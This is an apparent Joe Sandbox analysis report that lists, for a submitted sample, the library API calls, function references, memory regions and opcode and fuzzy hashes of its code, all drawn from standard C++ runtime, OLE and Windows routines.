                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: EmptyRect$H_prolog3
                                  • String ID: <m$False$True
                                  • API String ID: 3752103406-2469294776
                                  • Opcode ID: 496e7b7b7f0c9143ee1a9ce9eb518cab69d7894321b22806830f331f95985234
                                  • Instruction ID: df13e06cf9fb51d7e9569a7b0836c1fca328eb2faebcd8c1f3dc25fb0e9e690d
                                  • Opcode Fuzzy Hash: 496e7b7b7f0c9143ee1a9ce9eb518cab69d7894321b22806830f331f95985234
                                  • Instruction Fuzzy Hash: 92519CB0801B418FC362EF7AC5857DAFBE8BFA5304F10595FD0AE962A1CBB42644CB15
                                  APIs
                                    • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                  • std::locale::_Init.LIBCPMT ref: 004024B4
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004024BD
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004024E9
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00402532
                                  • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00402541
                                    • Part of subcall function 00403BF0: _free.LIBCMT ref: 00403C05
                                    • Part of subcall function 00403BF0: _malloc.LIBCMT ref: 00403C2D
                                    • Part of subcall function 00403BF0: _memmove.LIBCMT ref: 00403C3E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::_$_mallocstd::locale::_$InitLocimp::_Locinfo::_Locinfo_ctorLockitLockit::_MakelocXinvalid_argument_free_memmove
                                  • String ID: bad locale name$chs
                                  • API String ID: 2402735708-3828856240
                                  • Opcode ID: 2ea933c890a4a8e7387b443e98d64d2454118bce2f2a9462a5fc9814065aff5e
                                  • Instruction ID: 0ba4dabfef8362b40dd62f4289b6948131dcb20ba18949e055e96b8ca92e1267
                                  • Opcode Fuzzy Hash: 2ea933c890a4a8e7387b443e98d64d2454118bce2f2a9462a5fc9814065aff5e
                                  • Instruction Fuzzy Hash: EE4125B1C04288AECB10DFA8C981AAEFFB6AF25310F54457EE541A33C1D3795A0CC759
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041DF9D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041DFC0
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0041E044
                                  • __CxxThrowException@8.LIBCMT ref: 0041E052
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041E065
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041E07F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2427920155-3145022300
                                  • Opcode ID: b275e407ffd772c85200b397ff873c011073643755b96022c06a5570a7028a9e
                                  • Instruction ID: 78e5d98d9483bb3070d4137d2c4f27e99fadb8ccf3661470edd8c3973bd89120
                                  • Opcode Fuzzy Hash: b275e407ffd772c85200b397ff873c011073643755b96022c06a5570a7028a9e
                                  • Instruction Fuzzy Hash: 8931F075800214CFDB14DF55D882BEE7BA4FB04321F04861EEC12A72D1CB79AE45CB99
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 006620CF
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006620D9
                                  • int.LIBCPMT ref: 006620F0
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00662127
                                  • __CxxThrowException@8.LIBCMT ref: 00662135
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066214B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2227438316-3145022300
                                  • Opcode ID: 68625419d1e46fb87a2bd96cbae347e6e82734de59dab652bb2c3044e45e871a
                                  • Instruction ID: dbae5003dd7b1a917c6ba333b8899da3fed0e2df6253afcbe04d7b6e044a327d
                                  • Opcode Fuzzy Hash: 68625419d1e46fb87a2bd96cbae347e6e82734de59dab652bb2c3044e45e871a
                                  • Instruction Fuzzy Hash: 4F01A13190021A9BCB05EBA0D852AFDB727AF41721F14011DFA117B2D1DF789A458799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 006612BA
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006612C4
                                  • int.LIBCPMT ref: 006612DB
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661312
                                  • __CxxThrowException@8.LIBCMT ref: 00661320
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661336
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2227438316-3145022300
                                  • Opcode ID: 478dfa9bf221e19db388ce8db3ce22621b59aa958bb283efbc7e3a7c4fa525ee
                                  • Instruction ID: 8f0eb705d629243e1d61d080c535eb92b12c8b0dcfae7b8d4eccacccd604cadb
                                  • Opcode Fuzzy Hash: 478dfa9bf221e19db388ce8db3ce22621b59aa958bb283efbc7e3a7c4fa525ee
                                  • Instruction Fuzzy Hash: 0201AD329002599BCB05EBB0C852AFE7727AF81720F24012DF9117B2D1DF78AE458B99
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066C4EC
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066C4F6
                                  • int.LIBCPMT ref: 0066C50D
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066C544
                                  • __CxxThrowException@8.LIBCMT ref: 0066C552
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0066C568
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2227438316-3145022300
                                  • Opcode ID: 115021aecaad854839767955b3c3cc940e4c98a18ee708eb2b21f54e70f46e1d
                                  • Instruction ID: 19471a1755b04b480c34b96f97f8b0ff5e08ee88c414c319f28c5d6c97c327ab
                                  • Opcode Fuzzy Hash: 115021aecaad854839767955b3c3cc940e4c98a18ee708eb2b21f54e70f46e1d
                                  • Instruction Fuzzy Hash: 6201C0319006099BCB05EBB0DC52AFE7737AF80720F24051DF9117B2D1DF78AA459799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661EF8
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661F02
                                  • int.LIBCPMT ref: 00661F19
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661F50
                                  • __CxxThrowException@8.LIBCMT ref: 00661F5E
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661F74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast
                                  • API String ID: 2227438316-3145022300
                                  • Opcode ID: 030c3ac3221abdecf229f796243e43403722d1f972e7e3d8899abf85c64e4ff3
                                  • Instruction ID: 1db65516f59b5ce27a9d3c96ffc7851b257e255ef8e8e758242c989982d1c801
                                  • Opcode Fuzzy Hash: 030c3ac3221abdecf229f796243e43403722d1f972e7e3d8899abf85c64e4ff3
                                  • Instruction Fuzzy Hash: 2D01AD319002099BCB05EBB0D842AFE7767AF81721F28051DF9117B2E1CF78AA059799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00548901
                                  • VariantInit.OLEAUT32(?), ref: 00548931
                                  • VariantInit.OLEAUT32(?), ref: 00548937
                                  • VariantClear.OLEAUT32(?), ref: 00548983
                                  • VariantClear.OLEAUT32(?), ref: 00548989
                                    • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                    • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                  • SysAllocStringLen.OLEAUT32(?,00000005), ref: 005489E4
                                  • VariantClear.OLEAUT32(?), ref: 00548A9A
                                  • VariantClear.OLEAUT32(?), ref: 00548AA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$H_prolog3Init$AllocException@8StringThrow
                                  • String ID:
                                  • API String ID: 1678399783-0
                                  • Opcode ID: 1a8dc7c3512ab5272abf188f378567add94ccb3953c2893d7096f0d2e96bef59
                                  • Instruction ID: a378faf91b6559feb438f4b9f25e43d69ddbce47b6a1d649b240fc32f42776ac
                                  • Opcode Fuzzy Hash: 1a8dc7c3512ab5272abf188f378567add94ccb3953c2893d7096f0d2e96bef59
                                  • Instruction Fuzzy Hash: 84614D7190024ADFCF10DFE4C8889BEBBB9BF49314B28486EE515EB250CB759E45CB51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
                                  • String ID:
                                  • API String ID: 1844215989-0
                                  • Opcode ID: 22c24c3c4b21b6d19984e6902b00b1a94ce3029435d0ccd71c37655f779d9770
                                  • Instruction ID: 48c2eb9c913118c4735217a8a00d77398e2e174d0bec328fecf9b45859ffdf8e
                                  • Opcode Fuzzy Hash: 22c24c3c4b21b6d19984e6902b00b1a94ce3029435d0ccd71c37655f779d9770
                                  • Instruction Fuzzy Hash: 12313D30601741DFDB24EF64C899AA9BFE2BF44304F54846CF19A8B6B2CBB19D80CB55
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 005475AE
                                  • SysAllocString.OLEAUT32(?), ref: 0054767C
                                    • Part of subcall function 0054C959: _memset.LIBCMT ref: 0054C96B
                                  • lstrlenW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000001,?), ref: 005475E8
                                  • VariantClear.OLEAUT32(?), ref: 00547654
                                  • VariantClear.OLEAUT32(?), ref: 0054765A
                                  • VariantClear.OLEAUT32(?), ref: 00547660
                                  • VariantClear.OLEAUT32(00000000), ref: 00547666
                                  • SysFreeString.OLEAUT32(?), ref: 0054766B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ClearVariant$String$AllocFreeH_prolog3_memsetlstrlen
                                  • String ID:
                                  • API String ID: 2053117175-0
                                  • Opcode ID: 2a50d400dccc53430de0076eedc0f0a48ce636d3b7619acd097371a26fd5eb3c
                                  • Instruction ID: dd4d0c44e6f298f852898ebe73055f83b3dd5b9e94302fefdb8e4aa343dd379a
                                  • Opcode Fuzzy Hash: 2a50d400dccc53430de0076eedc0f0a48ce636d3b7619acd097371a26fd5eb3c
                                  • Instruction Fuzzy Hash: 64313C7180014EEFDF11EFA0DC48AED7FB9EF58344F108019F905AB151DA359A55DB61
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 03643580
                                  • CoInitialize.OLE32(00000000), ref: 03643587
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 03643667
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0364367A
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03643689
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$AccessDataInitInitializeVariant
                                  • String ID:
                                  • API String ID: 1770467583-0
                                  • Opcode ID: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                  • Instruction ID: 52fbddd7c4b1d7f0eb3f3525fb7c739389f804a4d77d33d0c7af786478090754
                                  • Opcode Fuzzy Hash: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                  • Instruction Fuzzy Hash: 25513A75E0061AAFEF01DFA4CC88AAEBB79EF49305B204459FD11EB360D771DA158B90
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 1000357C
                                  • CoInitialize.OLE32(00000000), ref: 10003583
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 10003663
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10003676
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10003685
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$AccessDataInitInitializeVariant
                                  • String ID:
                                  • API String ID: 1770467583-0
                                  • Opcode ID: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                  • Instruction ID: 6a08fc82bc3730ba37a0e2c4be62a39793870260165c286fe321372d819fc844
                                  • Opcode Fuzzy Hash: c0c3d5d2c829e32bcd8bcd4ba14b769915719691fda59041b1900c6aa967e1cc
                                  • Instruction Fuzzy Hash: CE515D71A00619BFEB02DFA4CC88AAFBBBDEF45344F108459F901EB224D772DA058B50
                                  APIs
                                  • _malloc.LIBCMT ref: 00424FEF
                                    • Part of subcall function 0063A2D7: __FF_MSGBANNER.LIBCMT ref: 0063A2F0
                                    • Part of subcall function 0063A2D7: __NMSG_WRITE.LIBCMT ref: 0063A2F7
                                    • Part of subcall function 0063A2D7: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00646709,00000000,00000001,00000000,?,00649909,00000018,0071ACE0,0000000C,00649999), ref: 0063A31C
                                  • _free.LIBCMT ref: 00425013
                                  • _memset.LIBCMT ref: 00425074
                                  • CreateDIBSection.GDI32(00000000,00000008,00000000,00000008,00000000,00000000), ref: 00425089
                                  • _free.LIBCMT ref: 0042509A
                                    • Part of subcall function 00638E31: HeapFree.KERNEL32(00000000,00000000,?,0040201B,?,ED2F953D), ref: 00638E47
                                  • _memcpy_s.LIBCMT ref: 004250C0
                                  • _free.LIBCMT ref: 0042510A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$Heap$AllocateCreateFreeSection_malloc_memcpy_s_memset
                                  • String ID:
                                  • API String ID: 3083015433-0
                                  • Opcode ID: da58268f5152990dcaa61327567e6c040b37fab0ab98cc9776ccf8020c36bc0e
                                  • Instruction ID: 360f0078a5988b9aa22d51a7b1d2b6352d301195ba829fd668ebaa24be426122
                                  • Opcode Fuzzy Hash: da58268f5152990dcaa61327567e6c040b37fab0ab98cc9776ccf8020c36bc0e
                                  • Instruction Fuzzy Hash: AC41F076A00B105FE320DF25EC41BA7B7E5AF84720F54842EE949CB352EB75E910CB98
                                  APIs
                                  • GetParent.USER32(?), ref: 0053E612
                                  • PeekMessageW.USER32(004114B0,00000000,00000000,00000000,00000000), ref: 0053E636
                                  • UpdateWindow.USER32(?), ref: 0053E651
                                  • SendMessageW.USER32(00000024,00000121,00000000,?), ref: 0053E672
                                  • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 0053E68A
                                  • UpdateWindow.USER32(?), ref: 0053E6CD
                                  • PeekMessageW.USER32(004114B0,00000000,00000000,00000000,00000000), ref: 0053E6FE
                                    • Part of subcall function 0053B5F7: GetWindowLongW.USER32(?,000000F0), ref: 0053B602
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                  • String ID:
                                  • API String ID: 2853195852-0
                                  • Opcode ID: bf5034fef45aed2f1f820b7ba5d37124e34f0dd0f8c4dc400c1294b4b1013a2a
                                  • Instruction ID: 61a98ce6f9eafbb864f9943975ccc99499e40b493fb2bc4ba56c0af499a80e57
                                  • Opcode Fuzzy Hash: bf5034fef45aed2f1f820b7ba5d37124e34f0dd0f8c4dc400c1294b4b1013a2a
                                  • Instruction Fuzzy Hash: 54417B3090078AABDF219FA5DC8AEAEBFF5FF91744F108529E442A61A1DB718940DB10
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 036491D8
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 036491EC
                                  • __fassign.LIBCMT ref: 0364919F
                                    • Part of subcall function 0364BE5F: __mbsnbcpy_l.LIBCMT ref: 0364BE6F
                                  • __fassign.LIBCMT ref: 03649257
                                  • __fassign.LIBCMT ref: 03649286
                                  • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 03649299
                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 036492AD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                  • String ID:
                                  • API String ID: 2854908881-0
                                  • Opcode ID: d39bb7027f6251b25b08e012973c6ff04273f925ee12b3df7fdcad5c3bd8eb85
                                  • Instruction ID: de793b54a01b413d298bebe151fc9a1171d7e90b31da78f88da9f4ebeaf41ec3
                                  • Opcode Fuzzy Hash: d39bb7027f6251b25b08e012973c6ff04273f925ee12b3df7fdcad5c3bd8eb85
                                  • Instruction Fuzzy Hash: E841E375D043585ADB60DB68CD8CBEB7BED9B05300F5841E9DA94D7281DB708A888B54
                                  APIs
                                  • _memset.LIBCMT ref: 0042D5F0
                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 0042D642
                                  • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 0042D64F
                                  • VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 0042D65C
                                  • VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 0042D669
                                  • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 0042D675
                                  • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 0042D682
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
